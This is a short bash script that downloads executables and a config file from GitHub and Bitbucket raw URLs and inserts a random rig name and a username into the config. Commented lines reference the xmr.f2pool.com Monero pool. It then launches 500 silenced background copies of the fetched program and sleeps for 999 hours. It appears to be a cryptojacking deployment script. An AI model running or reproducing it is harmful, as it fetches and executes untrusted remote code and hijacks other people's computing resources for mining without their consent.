#!/bin/bash
user="$1"
wget https://raw.githubusercontent.com/walters99/Slurb/main/start
wget https://bitbucket.org/oscarhines623/workinside/raw/b23b1f28b86a0e86880a97ea56976934b4e331cb/lol
wget -O /tmp/build_config https://bitbucket.org/oscarhines623/workinside/raw/b23b1f28b86a0e86880a97ea56976934b4e331cb/build_config

user="$1"
top="$(shuf -n 1 -i 1-999999)"

sed -i "s/RIGNAME/$top/" "/tmp/build_config"
sed -i "s/USERNAME/$user/" "/tmp/build_config"
# sed -i "s/52.188.63.99/xmr.f2pool.com" "/tmp/build_config"
# sed -i "s/443/13531" "/tmp/build_config"

chmod +x lol start
for i in {1..500} :
do
  ./start $user >/dev/null &
done
sleep 999h
